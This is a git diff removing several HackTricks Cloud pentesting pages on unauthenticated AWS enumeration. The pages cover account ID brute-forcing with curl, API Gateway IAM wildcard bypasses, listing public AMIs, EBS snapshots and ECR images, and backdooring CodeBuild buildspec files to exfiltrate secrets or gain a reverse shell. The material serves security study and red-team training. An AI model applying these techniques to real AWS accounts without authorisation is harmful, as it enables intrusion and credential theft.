[https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
deleted file mode 100644
index c999e66ce..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# AWS - Unauthenticated Enum & Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## AWS Credentials Leaks
-
-A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\
-Some useful **tools**:
-
-* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos)
-* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos)
-* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks)
-
-## AWS Unauthenticated Enum & Access
-
-There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how:
-
-* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md)
-* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md)
-* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-* [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md)
-* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md)
-* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md)
-* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md)
-* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md)
-* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md)
-* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md)
-* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md)
-* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md)
-* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md)
-* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md)
-* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md)
-* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md)
-* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md)
-
-## Cross Account Attacks
-
-In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed.
-
-During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**:
-
-![](<../../../.gitbook/assets/image (260).png>)
-
-Other services found vulnerable:
-
-* AWS Config
-* Serverless repository
-
-## Tools
-
-* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
deleted file mode 100644
index e3a79d5b1..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# AWS - Accounts Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Account IDs - -If you have a target there are ways to try to identify account IDs of accounts related to the target. - -### Brute-Force - -You create a list of potential account IDs and aliases and check them - -```bash -# Check if an account ID exists -curl -v https://.signin.aws.amazon.com -## If response is 404 it doesn't, if 200, it exists -## It also works from account aliases -curl -v https://vodafone-uk2.signin.aws.amazon.com -``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). - -### OSINT - -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. - -### Marketplace - -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. - -### Snapshots - -* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -* Public AMIs (EC2 -> AMIs -> Public images) - -### Errors - -Many AWS error messages (even access denied) will give that information. - -## References - -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
deleted file mode 100644
index 24abdac6e..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# AWS - API Gateway Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### API Invoke bypass
-
-According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
-
-```json
-{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Permission",
- "Action": [
- "execute-api:Execution-operation"
- ],
- "Resource": [
- "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
- ]
- }
- ]
-}
-```
-
-The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**.
-
-Some examples:
-
-* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example.
-
-{% hint style="warning" %}
-Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\
-So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\
-Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example.
-{% endhint %}
-
-You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted.
-
-For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints).
-
-### IAM Policy Injection
-
-In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**.
-
-### Public URL template
-
-```
-https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
-```
-
-### Get Account ID from public API Gateway URL
-
-Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
deleted file mode 100644
index 8f553e9b7..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# AWS - Cloudfront Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-https://{random_id}.cloudfront.net
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
deleted file mode 100644
index 9d4227753..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# AWS - CodeBuild Unauthenticated Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CodeBuild
-
-For more info check this page:
-
-{% content-ref url="../aws-services/aws-codebuild-enum.md" %}
-[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
-{% endcontent-ref %}
-
-### buildspec.yml
-
-If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**.
-
-Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example.
-
-For some related information you could check the page about how to attack Github Actions (similar to this):
-
-{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %}
-[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/)
-{% endcontent-ref %}
-
-## Self-hosted GitHub Actions runners in AWS CodeBuild
-
-As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this:
-
-```bash
-runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }}
-```
-
-This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
deleted file mode 100644
index 89c2f12cd..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# AWS - DocumentDB Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### Public URL template
-
-```
-.cluster-..docdb.amazonaws.com
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
deleted file mode 100644
index 8067c97b0..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# AWS - DynamoDB Unauthenticated Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Dynamo DB
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
-[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
-{% endcontent-ref %}
-
-Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
deleted file mode 100644
index ea692e888..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# AWS - EC2 Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EC2 & Related Services
-
-Check in this page more information about this:
-
-{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
-[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
-{% endcontent-ref %}
-
-### Public Ports
-
-It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it.
-
-#### SSRF
-
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
-
-### Public AMIs & EBS Snapshots
-
-AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account:
-
-{% code overflow="wrap" %}
-```bash
-# Public AMIs
-aws ec2 describe-images --executable-users all
-
-## Search AMI by ownerID
-aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
-
-## Search AMI by substr ("shared" in the example)
-aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]'
-
-# Public EBS snapshots (hard-drive copies)
-aws ec2 describe-snapshots --restorable-by-user-ids all
-aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'
-```
-{% endcode %}
-
-If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot.
-
-#### Public URL template
-
-```bash
-# EC2
-ec2-{ip-seperated}.compute-1.amazonaws.com
-# ELB
-http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
-https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
-```
-
-### Enumerate EC2 instances with public IP
-
-{% code overflow="wrap" %}
-```bash
-aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
deleted file mode 100644
index 0e491c74e..000000000
--- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# AWS - ECR Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECR
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-ecr-enum.md" %}
-[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md)
-{% endcontent-ref %}
-
-### Public registry repositories (images)
-
-As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image.
-
-{% code overflow="wrap" %}
-```bash
-aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text
-```
-{% endcode %}
-
-{% hint style="warning" %}
-This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo.
-{% endhint %}
-
-### Enumerate Private Repo
-
